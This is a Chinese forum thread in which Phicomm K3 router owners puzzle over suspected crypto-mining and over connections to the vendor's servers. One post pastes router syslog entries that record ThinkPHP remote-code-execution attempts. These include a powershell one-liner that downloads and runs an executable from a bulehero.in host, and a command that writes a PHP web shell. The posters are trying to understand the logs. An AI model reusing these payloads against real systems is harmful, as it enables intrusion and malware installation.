这可不得了大神来分析一下 K3被挖矿了？

yang735 · 发表于 2019-2-28 13:57

占个位置看一下结果，这玩意到底是什么漏洞

DouBreak · 发表于 2019-2-28 14:22

求解！！！！！！！！！

jgdhiphop · 发表于 2019-2-28 16:01

这个需要大神来解释一下了，本人小白看不懂啊

hear24 · 发表于 2019-2-28 18:51

同版本固件，没有发现你说的download

MJ_E · 发表于 2019-2-28 19:01

跟帖观察。

安静远行 · 发表于 2019-2-28 19:10

围观一下紫薯布丁

谁不曾有过遗憾 · 发表于 2019-3-1 09:48

我手上的3台K3都有差不多的情况.
固件官改2.02

ttxl123 · 发表于 2019-3-1 09:49

目前未发现局域网电脑异常就是无意间点进去看到了日志

ttxl123 · 发表于 2019-3-1 09:53

jzyjjzz 发表于 2019-2-28 13:50
楼主,我今天也碰了一个很奇怪的事情,我的主路由是K3C刷的官改1.6,二级路由是K3刷的TB的梅林.今天早上莫名的 ...

你这个更玄幻不懂

ttxl123 · 发表于 2019-3-1 09:58

badcrazy 发表于 2019-2-28 12:10
这个应该是斐讯的路由app相关的东西吧

就是不懂啊也没有用那个APP 现在怀疑是哪个php恶意文件了

ttxl123 · 发表于 2019-3-1 10:02

谁不曾有过遗憾发表于 2019-3-1 09:48
我手上的3台K3都有差不多的情况.
固件官改2.02

哇这说明了什么？？？

badcrazy · 发表于 2019-3-1 14:34

ttxl123 发表于 2019-3-1 09:58
就是不懂啊也没有用那个APP 现在怀疑是哪个php恶意文件了

你用不用app路由器都会连斐讯服务器，否则app怎么穿透

ttxl123 · 发表于 2019-3-1 15:54

badcrazy 发表于 2019-3-1 14:34
你用不用app路由器都会连斐讯服务器，否则app怎么穿透

是一直有斐讯的进程在运行。。。
  597 admin    3192 S phi_report
  731 admin    1196 S wl_cr
  746 admin    1060 S btn
  754 admin    2500 S uhmi
  783 admin    1132 S phi_speed1

badcrazy · 发表于 2019-3-1 15:58

ttxl123 发表于 2019-3-1 15:54
是一直有斐讯的进程在运行。。。
597 admin 3192 S phi_report
731 admin 1196 S wl ...

对啊，我不是说了不管你用不用app都会连斐讯服务器的

ttxl123 · 发表于 2019-3-1 16:00

badcrazy 发表于 2019-3-1 15:58
对啊，我不是说了不管你用不用app都会连斐讯服务器的

正常的也就算了可是这一堆明显有问题了
Feb 27 08:49:28 K3B user.err syslog: PHIAPP url:/public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.buleher
Feb 27 08:49:29 K3B user.err syslog: PHIAPP url:/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php
Feb 27 08:49:30 K3B user.err syslog: PHIAPP url:/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start%20C:/12.exe
Feb 27 09:07:23 K3B user.err syslog: PHIAPP url:/update.asp?content=2A9A826AC6FB90ECF4B2F7616AF8FF9BD1BB13C1A0FEC5F83CAAAA106FC52533617BD2A7E9691CBE2608A365D1084681159796E42CA803EBDC6420F0CD383B69162C58F94A2236651BFBE818AF0A5C678BE82E6646AFD021589D63CAB958C1A5FF04

账号		自动登录	找回密码
密码			立即注册

[k3] 这可不得了大神来分析一下 K3被挖矿了？

本帖子中包含更多资源

点评

点评

点评

[k3] 这可不得了 大神来分析一下 K3被挖矿了？

本帖子中包含更多资源

点评

点评

点评

[k3] 这可不得了大神来分析一下 K3被挖矿了？